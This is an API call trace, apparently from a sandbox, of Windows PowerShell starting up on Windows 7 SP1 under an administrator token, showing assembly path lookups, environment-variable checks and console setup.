	[0508.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0508.157] CoTaskMemAlloc (cb=0x104) returned 0x20da70
	[0508.157] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20da70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0508.157] CoTaskMemFree (pv=0x20da70) 
	[0510.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xad540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0510.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xad540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0511.580] CoTaskMemAlloc (cb=0x104) returned 0x20db80
	[0511.580] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20db80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.581] CoTaskMemFree (pv=0x20db80) 
	[0511.582] CoTaskMemAlloc (cb=0x104) returned 0x20db80
	[0511.582] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20db80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0511.582] CoTaskMemFree (pv=0x20db80) 
	[0512.219] CoTaskMemAlloc (cb=0x104) returned 0x20db80
	[0512.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20db80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.219] CoTaskMemFree (pv=0x20db80) 
	[0512.219] CoTaskMemAlloc (cb=0x104) returned 0x20db80
	[0512.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20db80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.220] CoTaskMemFree (pv=0x20db80) 
	[0512.220] CoTaskMemAlloc (cb=0x104) returned 0x20db80
	[0512.220] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20db80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0512.220] CoTaskMemFree (pv=0x20db80) 
	[0514.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xad540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0514.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xad540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0514.186] CoTaskMemAlloc (cb=0x104) returned 0x20db80
	[0514.186] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20db80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.186] CoTaskMemFree (pv=0x20db80) 
	[0514.189] CoTaskMemAlloc (cb=0x104) returned 0x20db80
	[0514.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20db80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0514.189] CoTaskMemFree (pv=0x20db80) 
	[0517.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0517.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0523.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xad540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0523.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xad540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0530.715] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0530.715] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0530.715] CoTaskMemFree (pv=0x20dda0) 
	[0530.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0530.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0530.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0531.758] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0xad660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0531.758] SetErrorMode (uMode=0x1) returned 0x1
	[0531.759] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0xad8e0 | out: lpFileInformation=0xad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0531.759] SetErrorMode (uMode=0x1) returned 0x1
	[0535.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0535.178] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0535.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0535.181] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0535.181] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0535.181] CoTaskMemFree (pv=0x20dda0) 
	[0535.183] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0535.183] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0535.183] CoTaskMemFree (pv=0x20dda0) 
	[0535.183] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0535.183] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0535.183] CoTaskMemFree (pv=0x20dda0) 
	[0535.186] CoCreateGuid (in: pguid=0xadca8 | out: pguid=0xadca8*(Data1=0xcec80ddb, Data2=0x1cd0, Data3=0x4cf7, Data4=([0]=0x96, [1]=0x8c, [2]=0x18, [3]=0x53, [4]=0x59, [5]=0xca, [6]=0xb, [7]=0xde))) returned 0x0
	[0535.188] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0535.188] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0535.188] CoTaskMemFree (pv=0x20dda0) 
	[0535.191] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0535.191] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0535.191] CoTaskMemFree (pv=0x20dda0) 
	[0536.161] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0536.161] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0536.161] CoTaskMemFree (pv=0x20dda0) 
	[0536.168] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0536.170] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xad950 | out: lpConsoleScreenBufferInfo=0xad950) returned 1
	[0536.177] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0536.195] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xad950 | out: lpConsoleScreenBufferInfo=0xad950) returned 1
	[0536.218] GetVersionExW (in: lpVersionInformation=0xad8e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xad8e0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0536.221] GetCurrentProcess () returned 0xffffffffffffffff
	[0536.222] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xad978 | out: TokenHandle=0xad978*=0x310) returned 1
	[0536.226] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xad898 | out: TokenInformation=0x0, ReturnLength=0xad898) returned 0
	[0536.227] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1672e0
	[0536.227] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x8, TokenInformation=0x1672e0, TokenInformationLength=0x4, ReturnLength=0xad898 | out: TokenInformation=0x1672e0, ReturnLength=0xad898) returned 1
	[0536.229] DuplicateTokenEx (in: hExistingToken=0x310, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xad9f8 | out: phNewToken=0xad9f8*=0x30c) returned 1
	[0536.229] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xad898 | out: TokenInformation=0x0, ReturnLength=0xad898) returned 0
	[0536.229] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x167290
	[0536.229] GetTokenInformation (in: TokenHandle=0x310, TokenInformationClass=0x8, TokenInformation=0x167290, TokenInformationLength=0x4, ReturnLength=0xad898 | out: TokenInformation=0x167290, ReturnLength=0xad898) returned 1
	[0536.230] CheckTokenMembership (in: TokenHandle=0x30c, SidToCheck=0x2d44bf8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xada08 | out: IsMember=0xada08) returned 1
	[0536.230] CloseHandle (hObject=0x30c) returned 1
	[0536.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0536.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0536.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0536.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0537.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad460, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0537.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0537.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0537.224] CoTaskMemAlloc (cb=0x804) returned 0x1b75d880
	[0537.224] GetConsoleTitleW (in: lpConsoleTitle=0x1b75d880, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0538.303] CoTaskMemFree (pv=0x1b75d880) 
	[0538.328] CoTaskMemAlloc (cb=0x804) returned 0x1b75e130
	[0538.328] GetConsoleTitleW (in: lpConsoleTitle=0x1b75e130, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0538.329] CoTaskMemFree (pv=0x1b75e130) 
	[0538.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0538.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0538.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0538.333] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0541.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0541.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0541.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0541.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0541.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0541.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0541.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0541.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0541.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0541.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0542.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0542.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0542.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0542.497] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xad470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
